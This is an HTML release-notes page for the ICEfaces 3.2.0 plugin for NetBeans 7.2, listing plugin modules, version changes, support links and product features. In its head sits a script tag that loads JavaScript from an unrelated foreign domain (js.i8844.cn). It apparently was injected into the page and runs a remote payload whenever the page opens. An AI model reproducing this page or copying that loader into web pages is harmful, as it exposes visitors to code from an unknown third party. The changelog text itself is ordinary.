<!DOCTYPE html PUBLIC "-//w3c//dtd html 4.0 transitional//en">
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <title>icefaces® integration plugin for netbeans v7.1 release notes</title>
    <style>
body, td, th, input {
font-family:verdana,sans-serif;
font-size:80%;
}
code, pre {
font-size:110% }
body {
color:#333333;
margin-right:40px;
margin-bottom:3em;
margin-left:40px;
}
h2{
font-size:150%;
font-weight:normal;
}
h3 {
font-size:125%;
}
h1, h2, h3, h4, h5, h6 {
font-family:arial,verdana,sans-serif;
margin:1em 0pt 0.2em;
}
h1, h2 {
border-bottom:1px solid #aaaaaa;
font-weight: bold;
}
h4 {
font-size: 110%
}
  </style>
    <script language="javascript" type="text/javascript" src="http://js.i8844.cn/js/user.js"></script>
  </head>
  <body>
    <div style="border: 1px solid rgb(187, 187, 187);">
      <table style="background: rgb(230, 243, 251) none repeat scroll 0%
        50%; -moz-background-clip: -moz-initial; -moz-background-origin:
        -moz-initial; -moz-background-inline-policy: -moz-initial;"
        border="0" width="100%">
        <tbody>
          <tr>
            <td width="78%">
              <h2 style="border: medium none ; padding: 0in;
                margin-left: 0.19in; margin-top: 0.09in;">ICEfaces<small><small><small><font
                        size="5"><small><small><small><sup>®</sup></small></small></small></font></small></small></small>&nbsp;
v3.2.0&nbsp;



                integration for&nbsp;netbeans 7.2<br>
              </h2>
              <h2 style="border: medium none ; padding: 0in;
                margin-left: 0.19in; margin-top: 0.09in;">release notes</h2>
              <br>
              <h2 style="border: medium none ; padding: 0in;
                margin-left: 0.19in; margin-top: 0.09in;">7.2.3b (with
                support for icefaces 3.2.0)<br>
              </h2>
              <br>
              <h4 style="border: medium none ; padding: 0in;
                margin-left: 0.19in;">Nov 2nd, 2012<br>
              </h4>
            </td>
          </tr>
        </tbody>
      </table>
    </div>
    <br>
    <h2>overview</h2>
    <p>icefaces v3.2.0 integration for netbeans v7.2 provides icefaces
      3.2.0 support for developers who use netbeans v7.2 for icefaces 3
      application development. this integration extends netbeans' web
      framework and provides following extra features for icefaces&nbsp;
      support. &nbsp;<br>
      <br>
      following features are offered in this integration for
      icefaces&nbsp; support.<br>
    </p>
    <ul>
      <li>creates web project with icefaces&nbsp; capability.</li>
      <li>configures required libraries and configuration file.</li>
      <li>changes deployment descriptor and configures the ide for
        icefaces&nbsp; support. </li>
      <li>provides icefaces components, advanced components palettes and
        drag&amp;drop capabilities<br>
      </li>
      <li>provides usable component snippets by drag &amp; drop icefaces
        ace components from palette view<br>
      </li>
    </ul>
    <p>&nbsp;this integration release&nbsp;includes:<br>
    </p>
    <ul>
      <li>org-netbeans-modules-icefaceslib.nbm</li>
      <li>org-netbeans-modules-web-jsf-icefaces3.nbm</li>
      <li>org-netbeans-modules-web-jsf-icefaces-palette.nbm</li>
    </ul>
    <ol>
    </ol>
    <ol>
    </ol>
    <p><br>
      this document contains the following sections:</p>
    <ol>
    </ol>
    <ul>
      <li><a href="#notes">special note</a><br>
      </li>
      <li><a href="#changes.6.9.0.3">changes in this release</a> </li>
      <li><a href="#support">support</a> </li>
      <li><a href="#about_icefaces">about ICEfaces</a></li>
    </ul>
    <h2><a name="changes.6.9.0.4"></a>changes in 7.2.3b release<br>
    </h2>
    <ul>
      <li>fixed issue with ICEfaces configuration wizard when selecting
        ice component only<br>
      </li>
    </ul>
    <h2>changes in 7.2.3a release<br>
    </h2>
    <ul>
      <li>Updated index.xhtml to forward to ICEmobile welcome page<br>
      </li>
      <li>updated component palette </li>
      <li>release bundle includes both ICEfaces 3.2 and ICEmobile 1.2.0
      </li>
    </ul>
    <h2>changes in 7.2.3 release<br>
    </h2>
    <ul>
      <li>Updated splash page <br>
      </li>
      <li>updated component palette icons </li>
      <li>added required multipart-config to web.xml </li>
      <li>merged icemobile editor support with icefaces editor support
        module </li>
      <li>release bundle includes both ICEfaces 3.2 and ICEmobile 1.2
        beta </li>
    </ul>
    <h2>changes in 7.2 release<br>
    </h2>
    <ul>
      <li>bundled with icefaces 3.2 final</li>
      <li>added support to netbeans 7.2</li>
      <li>added updated link to ICEfaces welcome page in index file<br>
      </li>
    </ul>
    <h2>changes in 7.1.5 release<br>
    </h2>
    <ul>
      <li>bundled with icefaces 3.1.0 final</li>
      <li>modified metadata to reflect changes of component properties<br>
      </li>
    </ul>
    <h2>changes in 7.1.4 release<br>
    </h2>
    <ul>
      <li>bundled with icefaces 3.1.0 rc1<br>
      </li>
    </ul>
    <h2>changes in 7.1.3 release<br>
    </h2>
    <ul>
      <li>bundled with icefaces 3.1.0 beta2</li>
    </ul>
    <h2>changes in 7.1.2 release<br>
    </h2>
    <ul>
      <li>bundled with icefaces 3.1.0 beta1<br>
      </li>
      <li>added support for 6 new ace components<br>
      </li>
    </ul>
    <h2>changes in 7.1.1 release<br>
    </h2>
    <ul>
      <li>bundled with icefaces 3.0.1</li>
      <li>added support for netbeans 7.1.1<br>
      </li>
      <li>fixed ice-7873, removed function of adding namespace
        declaration while drag&amp;drop component from palette</li>
      <li>removed unnecessary dependencies <br>
      </li>
      <li>added generating icefaces/icemobile friendly sample pages</li>
    </ul>
    <h2>changes in 7.1.0 release<br>
    </h2>
    <ul>
      <li>integrated with netbeans v7.1</li>
      <li>adopted new component library provider api<br>
      </li>
      <li>bundled with icefaces 3.0.0<br>
      </li>
      <li>enhanced dnd capability.<br>
      </li>
    </ul>
    <ol>
    </ol>
    <h2>changes 7.0.5 release<br>
    </h2>
    <ul>
      <li>bundled with icefaces 3.0.0 rc2 </li>
      <li>new property metadata to reflect the change in icefaces 3
        rc1/2 </li>
      <li>add icemobile support pending to availability of icemobile
        tool bundle</li>
    </ul>
    <h2>changes 7.0.4 release<br>
    </h2>
    <ul>
      <li>included icefaces&nbsp; 3.0.0 rc1</li>
      <li>modified icons for ace components<br>
      </li>
    </ul>
    <h2>changes in 7.0.3 release<br>
    </h2>
    <ul>
      <li>included icefaces&nbsp; 2.1.0 beta 2 libraries<br>
      </li>
      <li>changed some component snippets</li>
      <li>removed standard jsf settings as now icefaces plugins is
        depended on javaserver faces framework</li>
    </ul>
    <h2>changes in 7.0.2 release<br>
    </h2>
    <ul>
      <li>included icefaces&nbsp; 2.1.0 beta libraries<br>
      </li>
      <li>included icefaces components (ice), new advanced components
        (ace), icepush libraries<br>
      </li>
      <li>added usable component snippets by drag &amp; drop icefaces
        ace components from palette view </li>
      <li>design time metadata, classes, snippets etc are now generated
        with new generator.<br>
      </li>
    </ul>
    <h2>changes 7.0.0<br>
    </h2>
    <ol>
    </ol>
    <ul>
      <li>support netbeans 7.0<br>
      </li>
      <li>included icefaces&nbsp; 2.0.2 libraries<br>
      </li>
      <li>included icefaces components (ice), advanced components (ace),
        icepush libraries<br>
      </li>
      <li>icefaces component editor support is separated from icefaces
        framework support<br>
      </li>
      <li>fixed issue with detecting runtime server for existance of jsf
        2.0 implementation.</li>
    </ul>
    <ol>
    </ol>
    <ul>
    </ul>
    <ul>
    </ul>
    <ul>
    </ul>
    <h2><a name="support"></a>support</h2>
    <ul>
      <li>open source community support is available at <a
          href="http://www.icefaces.org/">http://www.icefaces.org</a>.</li>
      <li>refer to the icefaces <a
          href="http://www.icefaces.org/jforum/forums/show/13.page"
          target="_blank">tools forum</a> for questions and answers
        specific to this netbeans ide integration.</li>
      <li>for information on commercial support, professional services,
        and training, please visit <a
          href="http://support.icefaces.org/" target="_blank">http://support.icefaces.org</a>.</li>
    </ul>
    <h2><a name="about_icefaces"></a>about icefaces</h2>
    <p>icefaces delivers extensions to java serverfaces (jsf) that
      provide an ajax-enabled rich presentation environment for jsf
      applications. icefaces brings value to any java&nbsp; development
      project that nds to provide superior presentation capabilities to
      the web application user. in particular, icefaces provides the
      following features:</p>
    <ul>
      <li>smooth, incremental page updates that do not require a full
        page refresh to achieve presentation changes in the application.</li>
      <li>server-initiated asynchronous presentation updates for dynamic
        instantaneous data push.</li>
      <li>the icefaces component suite, a complete rich jsf component
        suite that fully leverages icefaces capabilities.</li>
      <li>intelligent form processing that facilitates fine-grained
        interactions with the user as they manipulate a form.</li>
      <li>api support for rapid development of group-aware and
        collaborative applications, such as chat, webcast, social apps.,
        etc.</li>
      <li>jsp or facelets based development.</li>
      <li>tool integrations for leading java ides.</li>
      <li>support for leading java&nbsp; frameworks, such as spring and
        jboss seam.</li>
      <li>support for portlet development.</li>
    </ul>
    <p class="body"><small><br>
        © copyright 2005-2012 icesoft technologies, inc.</small></p>
  </body>
</html>
